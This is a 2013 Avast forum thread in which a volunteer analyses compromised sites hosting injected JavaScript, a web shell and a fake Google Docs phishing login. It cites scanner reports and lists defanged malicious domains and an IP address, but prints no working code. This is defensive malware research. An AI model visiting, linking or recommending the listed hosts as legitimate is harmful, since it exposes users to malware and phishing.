Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Blacklisted IP - malware on site now closed?
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: Blacklisted IP - malware on site now closed? (Read 1774 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 33891
malware fighter
Blacklisted IP - malware on site now closed?
«
on:
November 23, 2013, 04:02:45 PM »
See:
https://www.virustotal.com/nl/url/c448b0d309c89a52c6c6e4ecddc7c0b151f16a3506b077333c36b9edd79d4e6e/analysis/1385218319/
See recent reports for same IP:
http://urlquery.net/report.php?id=7893395
This scan is clear: joomla software outdated and javascript malware detected:
http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fdiscoverpoznan.info%2F
See:
http://labs.sucuri.net/db/malware/malware-entry-mwjs2368
Users of Chrome and firefox browser are immediately alerted:
https://www.google.com/safebrowsing/diagnostic?site=discoverpoznan.info
Initial malware hoster seems dead now:
http://support.clean-mx.de/clean-mx/viruses.php?domain=ddns.info&sort=first%20desc
Code hick-up:
discoverpoznan dot info/modules/lite/assets/js/2.0.0-b2.js benign
[nothing detected] (script) discoverpoznan dot info/modules/lite/assets/js/2.0.0-b2.js
status: (referer=discoverpoznan dot info/)saved 355 bytes f00b5d1b3d6730dd36c400240e1d9da4bf7bd1f3
info: [decodingLevel=0] found JavaScript
suspicious:
Malware now seems closed:
http://support.clean-mx.de/clean-mx/viruses.php?ip=79.96.83.230&sort=first%20desc
pol
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 33891
malware fighter
Re: Blacklisted IP - malware on site now closed?
«
Reply #1 on:
November 23, 2013, 04:20:58 PM »
Another example of such a site: Up(nil): unknown_html RIPE US abuse at main-hosting dot com 31.170.163.240 to 31.170.163.240 ias3.com htxp://dgffugd.ias3.com/
See recent reports on same IP:
http://urlquery.net/report.php?id=7893741
eval(function(p,a,c,k,e,d) javascript code:
http://jsunpack.jeek.org/?report=40ef582bb17c4a750ef7be67166ac859b37eb1d9
Listed as suspicious ->
https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fdgffugd.ias3.com&hl=en
Injection check -> Suspicious Text before HTML <!-- saved from url=(0026)htxp://tfiledata.com/rema/ -->
SHell by DarK c0dr hack.
Google Browser Difference:
Not identical
Google: 11205 bytes Firefox: 295 bytes
Diff: 10910 bytes
First difference:
ml><head><meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>googe docs</title> <link rel="stylesheet" type="text/css" href="./remax - secure login_fi...
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 33891
malware fighter
Re: Blacklisted IP - malware on site now closed?
«
Reply #2 on:
November 23, 2013, 06:37:17 PM »
About what we saw here:
http://sitecheck.sucuri.net/scanner/
/
http://labs.sucuri.net/db/malware/malware-entry-mwjs2368
Let us inspect this piece of code:
http://jsunpack.jeek.org/?report=52ced770f769ce5160927c25faa4e8ece3b66861
(view this in a sand-boxed browser with NoScript and RequestPoicy extensions active)
and to understand the mass infection proble, read:
http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html
link article author = David Dede. Know that this form of Malware Dunp has been around sincve 2011.
We came across a similar issue earlier here:
http://forum.avast.com/index.php?topic=107715.5;wap2
And here we see the hex-decoding:
http://ddecode.com/hexdecoder/?results=5d031ad7b2822f26b88b830110745e61
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Blacklisted IP - malware on site now closed?